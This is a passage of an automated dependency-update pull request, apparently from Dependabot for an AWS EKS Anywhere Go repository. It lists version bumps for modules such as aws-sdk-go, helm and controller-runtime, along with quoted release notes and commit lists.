aws/etcdadm-controller","old_version":"1.0.25","new_version":"1.0.27","repository_url":"https://github.com/aws/etcdadm-controller"},{"name":"github.com/bmc-toolbox/bmclib/v2","old_version":"2.1.1-0.20231206130132-1063371b9ed6","new_version":"2.3.5","repository_url":"https://github.com/bmc-toolbox/bmclib"},{"name":"github.com/docker/cli","old_version":"29.2.0+incompatible","new_version":"29.4.3+incompatible","repository_url":"https://github.com/docker/cli"},{"name":"github.com/go-git/go-git/v5","old_version":"5.17.1","new_version":"5.19.0","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/go-jose/go-jose/v3","old_version":"3.0.4","new_version":"3.0.5","repository_url":"https://github.com/go-jose/go-jose"},{"name":"github.com/nutanix-cloud-native/prism-go-client","old_version":"0.3.4","new_version":"0.7.2","repository_url":"https://github.com/nutanix-cloud-native/prism-go-client"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.40.0","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/spf13/cobra","old_version":"1.10.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/vmware/govmomi","old_version":"0.51.0","new_version":"0.54.0","repository_url":"https://github.com/vmware/govmomi"},{"name":"go.uber.org/zap","old_version":"1.27.1","new_version":"1.28.0","repository_url":"https://github.com/uber-go/zap"},{"name":"golang.org/x/oauth2","old_version":"0.33.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"},{"name":"gopkg.in/ini.v1","old_version":"1.67.0","new_version":"1.67.2"},{"name":"helm.sh/helm/v3","old_version":"3.18.5","new_version":"3.20.2","repository_url":"https://github.com/helm/helm"},{"name":"sigs.k8s.io/cluster-api/test","old_version":"1.11.1","new_version":"1.11.10","repository_url":"https://github.com/kubernetes-sigs/cluster-api"},{"name":"sigs.k8s.io/controller-runtime","old_version":"0.22.4","new_version":"0.22.5","repository_url":"https://github.com/kubernetes-sigs/controller-runtime"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.2.2","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/itchyny/gojq","old_version":"0.12.17","new_version":"0.12.19","repository_url":"https://github.com/itchyny/gojq"},{"name":"k8s.io/kubelet","old_version":"0.29.5","new_version":"0.29.15","repository_url":"https://github.com/kubernetes/kubelet"}],"path":null,"ecosystem":"go"},"body":"Bumps the all-go-mod-patch-and-minor group with 25 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.30.1` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.167.1` | `1.301.0` |\n| [github.com/aws/aws-sdk-go-v2/service/ecr](https://github.com/aws/aws-sdk-go-v2) | `1.27.4` | `1.57.2` |\n| [github.com/aws/eks-anywhere-packages](https://github.com/aws/eks-anywhere-packages) | `0.4.5` | `0.4.15` |\n| [github.com/aws/etcdadm-bootstrap-provider](https://github.com/aws/etcdadm-bootstrap-provider) | `1.0.17` | `1.0.19` |\n| [github.com/aws/etcdadm-controller](https://github.com/aws/etcdadm-controller) | `1.0.25` | `1.0.27` |\n| [github.com/bmc-toolbox/bmclib/v2](https://github.com/bmc-toolbox/bmclib) | `2.1.1-0.20231206130132-1063371b9ed6` | `2.3.5` |\n| [github.com/docker/cli](https://github.com/docker/cli) | `29.2.0+incompatible` | `29.4.3+incompatible` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.17.1` | `5.19.0` |\n| [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) | `3.0.4` | `3.0.5` |\n| [github.com/nutanix-cloud-native/prism-go-client](https://github.com/nutanix-cloud-native/prism-go-client) | `0.3.4` | `0.7.2` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.40.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [github.com/vmware/govmomi](https://github.com/vmware/govmomi) | `0.51.0` | `0.54.0` |\n| [go.uber.org/zap](https://github.com/uber-go/zap) | `1.27.1` | `1.28.0` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| gopkg.in/ini.v1 | `1.67.0` | `1.67.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/cluster-api/test](https://github.com/kubernetes-sigs/cluster-api) | `1.11.1` | `1.11.10` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.2.2` | `5.3.1` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [k8s.io/kubelet](https://github.com/kubernetes/kubelet) | `0.29.5` | `0.29.15` |\n\nBumps the all-go-mod-patch-and-minor group with 10 updates in the /release/cli directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.54.12` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.32.7` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.40.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [github.com/aws/aws-sdk-go-v2/service/kms](https://github.com/aws/aws-sdk-go-v2) | `1.37.9` | `1.51.1` |\n| [github.com/fsouza/go-dockerclient](https://github.com/fsouza/go-dockerclient) | `1.12.2-0.20250814055408-c31f6141d29b` | `1.13.1` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.30.1 to 1.41.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.30.1...v1.41.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.26.6 to 1.32.17\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.32.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.17.7 to 1.19.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.17.7...credentials/v1.19.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/feature/ec2/imds` from 1.15.3 to 1.18.23\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/CHANGELOG.md\"\u003egithub.com/aws/aws-sdk-go-v2/feature/ec2/imds's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2023-05-04)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/cloudwatch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/cloudwatch/CHANGELOG.md#v1260-2023-05-04\"\u003ev1.26.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Adds support for filtering by metric names in CloudWatch Metric Streams.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/configservice\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/configservice/CHANGELOG.md#v1320-2023-05-04\"\u003ev1.32.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Updated ResourceType enum with new resource types onboarded by AWS Config in April 2023.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/connect\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/connect/CHANGELOG.md#v1541-2023-05-04\"\u003ev1.54.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Remove unused InvalidParameterException from CreateParticipant API\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ecs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/ecs/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Documentation update for new error type NamespaceNotFoundException for CreateCluster and UpdateCluster\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/networkfirewall\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/networkfirewall/CHANGELOG.md#v1280-2023-05-04\"\u003ev1.28.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for the Suricata REJECT option in midstream exception configurations.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/opensearch\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/opensearch/CHANGELOG.md#v1170-2023-05-04\"\u003ev1.17.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: DescribeDomainNodes: A new API that provides configuration information for nodes part of the domain\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/quicksight\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/quicksight/CHANGELOG.md#v1350-2023-05-04\"\u003ev1.35.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for Topic, Dataset parameters and VPC\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/rekognition\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/rekognition/CHANGELOG.md#v1270-2023-05-04\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new attribute FaceOccluded. Additionally, you can now select attributes individually (e.g. [\u0026quot;DEFAULT\u0026quot;, \u0026quot;FACE_OCCLUDED\u0026quot;, \u0026quot;AGE_RANGE\u0026quot;] instead of [\u0026quot;ALL\u0026quot;]), which can reduce response time.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/s3\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/s3/CHANGELOG.md#v1331-2023-05-04\"\u003ev1.33.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Documentation updates for Amazon S3\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/sagemaker\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.23/service/sagemaker/CHANGELOG.md#v1770-2023-05-04\"\u003ev1.77.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: We added support for ml.inf2 and ml.trn1 family of instances on Amazon SageMaker for deploying machine learning (ML) models for Real-time and Asynchronous inference. You can use these instances to achieve high performance at a low 